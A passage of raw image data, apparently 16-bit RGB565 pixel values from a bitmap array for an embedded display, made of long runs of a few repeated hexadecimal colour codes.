0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 